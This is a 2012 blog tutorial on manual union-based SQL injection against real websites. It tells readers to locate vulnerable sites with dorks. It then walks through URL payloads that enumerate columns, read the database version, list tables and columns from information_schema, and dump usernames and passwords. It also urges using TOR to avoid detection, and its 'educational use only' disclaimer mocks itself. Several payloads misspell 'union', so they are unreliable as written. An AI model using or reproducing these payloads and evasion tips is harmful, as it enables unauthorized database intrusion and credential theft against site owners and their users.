Monday, February 13, 2012

Basics of SQL injection and Manual SQL injection tutorial

hi guys sorry due to some problems, i was away now back to work hope you liked my the mole tutorial
This time we have manual SQL tutorial , we know there are lots and lots of tools for SQL injection but manual SQl injection is the best way and that increases your knowledge ABOUT sql injection and hacking with databases POINTS TO remember:
No its not a book they are just here to make understanding process of SQL injection more clear.

  • websites who need take out most of their web site using scripts and other things have PHP SQL database (structured query language)  
  • what is relational databases: consider an example of ms excel in which there are 2 tables of which 1st one is having data of school teachers name and students name and other table has all their marks and recods. so when you ask for some ones mark then the sql query will search for name and the corresponding marks in this way it establishes a RELATION between 2 tables so its called RDBMs
  • information.schema is a database present in every MySQL database which has information about main database like no. of columns no. of tables etc. and we will get all our information from it only ;)
  • MySQL is one of the best RDBMS but due to lazy admins they can be easily hacked and Database can be released. because there are some security measures like MYSQL real escape ' will remove any " ' " from the request URL. and like even if there is a SQL error it should not show in the web page yes u can hide it that makes it extremely difficult for hackers to hack the site 
  • i am postiong tutorial about most common and Easily available vulnerability in that we can exploit easliy 
  • for hacking SQLi vulnerable sites we need an ID or something like that  hope you know that.
  • in general computer language Concatenate means making 2 or more things show together. like add function
NOw lets start

  • find a vulnerable site you can find the best dorks list here
  • then we need to find number of columns for that we will use order by function, here we have to guess the number of columns then use it like this
.somesite.net/b.php?id=12+order+by-5 increase the number 5  till you dont get error that unknown column X or anything but usually its not more than 30  
  • then when you get no. of columns we have to find vulnerable column (at the end you will get access to all the data bases but now we need a vulnerable column to speak out all database details on our commands ;)
  • then we will find VULNERABLE columns so that we can use our functions on it. To find vulnerable columns we need to use union select function for that we will first put ID=null in our url or ID=-12 a minus sign before id no. then will put union concatente function like this 
ID=null+uninon+select+1,2,3,4,5--
  • so we will get vulernable columns in numbers so what you get the number of vulnerable columns you have to USe them for injecting SQL lang.
  • now we will find the version of database server is using. so you have to just put version() on the vulnerable column and with same query. now your url will look like this. then if the version is =or < than 5 we will use union based technique if its less than 5 we have to use error based SQL injection. (suppose vulnerable column is 4 so we get)
ID=null+uninon+select+1,2,3,version(),5-- 
  • so i assume that you have My sql version greater than 5.Now we will find no. of tables so that we can get our juicy info ;) to find no. of columns for that we will use 3 functions 
  1. "group_concat(table_name)" tells to show all tables in database, it put in place of vulnerable columns count.
  2. "from +information_schema.tables" tells to fetch information from information_schema.table (".table"  it shows that get table information as information_schema has many tables)
  3. +where+table_schema=database()-- it tells where tables are 
  • so our final URL looks like this  
ID=null+uninon+select+1,2,3,group_concat(table_name),5+from+information_schema.tables+ where+table_schema=database()--

  • now we have table names so we will now get columns for specific table or columns of all tables for that procedure is almost same just we have to change some functions 
  1. "group_concat(column_name)" column name instead of table name
  2. "from +information_schema.columns" tells to get data from columns (same way .columns shows that he wants data to be fetched from the section where all columns data is kept)
  3. +where+table_name="your table name here" (with QUotes)
  • so Our final URl looks like this 
ID=null+uninon+select+1,2,3,group_concat(column_name),5+from+information_schema.columns+ where+table_name="your table name here"--

  •  some times we are not allowed to use table name so we will convert them to ASCII code and use in this way  "char(your ascii code here)" and place it in place of table name and you are done :) you can convert your text to ASCII here 
  • Last step is Quite simple we have the columns name so we will see which ones are useful and then use SQL again to get columns data for example we want username and password (we always want this) so put an query like this 
ID=null+uninon+select+1,2,3,group_concat(ID,0x3a,username,0x0a,password,0x0a),5+from+your table name here--

  • So now we have the data one more thing 0x3a means colon so we will get result like this ID:username:password so that we can read it easily. for now this much only next time i will cover blind and downloading whole wordpress and other scritps database and SQL injection using XSS 
Hope you understand for any queries ask in comments
and yes make sure you use TOR onion routing because sometimes some sites detect thier usage and get your IP you can also be jailed for hacking attempts
USe this tutorial for educational and penetration testing purposes only, i am damn sure some of you will not do it lol















0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More